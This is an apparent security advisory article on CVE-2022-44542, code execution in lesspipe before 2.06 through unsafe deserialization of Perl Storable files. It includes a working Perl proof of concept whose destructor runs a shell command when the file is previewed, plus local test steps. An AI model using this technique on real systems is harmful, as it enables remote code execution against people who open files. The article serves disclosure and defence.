CVE CyberSecurity Database News

CVE-2022-44542 - Code Execution in lesspipe via Perl Storable (pst) Files

Poster -

Summary:  
CVE-2022-44542 impacts the popular lesspipe tool (before version 2.06), allowing remote attackers to execute arbitrary code on affected systems by tricking lesspipe into processing a malicious Perl Storable (.pst) file. If an attacker manages to get their evil .pst file on your server or desktop, and you run less or lesspipe against it, your machine could be compromised.

This article will break down the vulnerability, how the exploit works, include some code snippets, and offer protection tips. Don’t worry if you’re not a Perl pro—we’ll keep it simple.

What is lesspipe?

lesspipe is a filter script that previews many file types in the less pager. It runs decompression, formatting, and preview commands depending on the file type. For .pst files (created by Perl's Storable module), lesspipe runs pst2text, which can deserialize files with Perl's built-in Storable module.

The Problem – Bad Deserialization

When lesspipe opens a .pst file, it calls pst2text—which uses Perl's Storable::retrieve method. If you feed Storable a file that’s been tampered with, Perl may deserialize objects. When Perl objects are deserialized, the DESTROY function (like a destructor) can fire — and attackers can inject their own code there!

This problem is well-known in many programming languages: unsafe deserialization leads to code execution. In this case, any key/value pair in a Perl hash can trigger code when the object is destroyed.

Exploit Details

Imagine you upload a boobytrapped .pst file to a system with a vulnerable lesspipe. If a user previews it (even accidentally), Perl code will execute.

Example Malicious .pst File

Here's a sample exploit using a custom destructor. We create a Perl class with a DESTROY sub, which runs arbitrary commands. We store an instance of this class in a .pst file.

# evil_creator.pl - create evil .pst
package Evil;
use strict;
use warnings;

sub new { bless {}, shift }
sub DESTROY {
    # Run arbitrary code! For demo: touch /tmp/owned
    system("touch /tmp/owned");
}

package main;
use Storable;
my $evil = Evil->new;
store { foo => $evil }, 'evil.pst';


This makes a file evil.pst. When deserialized, the DESTROY runs, running system("touch /tmp/owned");.

> To test locally:
> You need Perl and the Storable module.  
> Run: perl evil_creator.pl
> Then: less evil.pst (if lesspipe is configured to handle .pst files)

If vulnerable, you’ll find /tmp/owned created.

Attacker only needs to get their .pst file opened (no extra user interaction)

- Unlike some other bugs, the attacker doesn’t need special permissions or to pass extra arguments. Just open the file.

Avoid opening unknown files with less or lesspipe

You can find the upstream fix in this commit.

- Original lesspipe CVE report
- lesspipe GitHub repo
- Debian Security Tracker - CVE-2022-44542
- NVD CVE Entry
- Perl Storable doc

Final Notes

Vulnerabilities like CVE-2022-44542 show how dangerous it can be for tools to blindly trust file contents—and how dangerous unsafe deserialization really is. By simply previewing a file, your system could be taken over. Always keep your tools updated, avoid opening unknown files, and disable risky file handlers when you don’t need them.

Timeline

Published on: 11/01/2022 01:15:00 UTC
Last modified on: 12/22/2022 20:37:00 UTC